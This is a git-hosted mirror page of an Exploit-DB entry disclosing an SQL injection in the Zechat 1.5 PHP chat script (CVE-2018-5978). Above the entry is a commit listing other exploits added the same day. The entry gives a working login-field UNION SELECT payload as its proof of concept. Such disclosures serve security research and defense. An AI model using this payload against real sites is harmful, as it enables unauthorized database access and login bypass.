bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/43865.txt
Offensive Security a02c2710c9 DB: 2018-01-24 
15 changes to exploits/shellcodes

MixPad 5.00 - Buffer Overflow
RAVPower 2.000.056 - Memory Disclosure

HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation
CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection
NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download
LiveCRM SaaS Cloud 1.0 - SQL Injection
Affiligator 2.1.0 - SQL Injection
RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin)
Easy Car Script 2014 - SQL Injection
Wchat 1.5 - SQL Injection
Zechat 1.5 - SQL Injection
Tumder 2.1 - SQL Injection
Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
Quickad 4.0 - SQL Injection
Flexible Poll 1.2 - SQL Injection
2018-01-24 05:01:58 +00:00

27 lines
No EOL
717 B
Text
Raw Blame History

# # # # #
# Exploit Title: Facebook Style Php Ajax Chat - Zechat 1.5 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://bylancer.com/
# Software Link: https://codecanyon.net/item/facebook-style-php-ajax-chat-zechat/16491266
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5978
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/login.php
#
# User: ' UNION ALL SELECT 0x31,0x32,0x33,concat(0x63)-- A
# Pass: anything
#
# # # # #
Reference in a new issue View git blame Copy permalink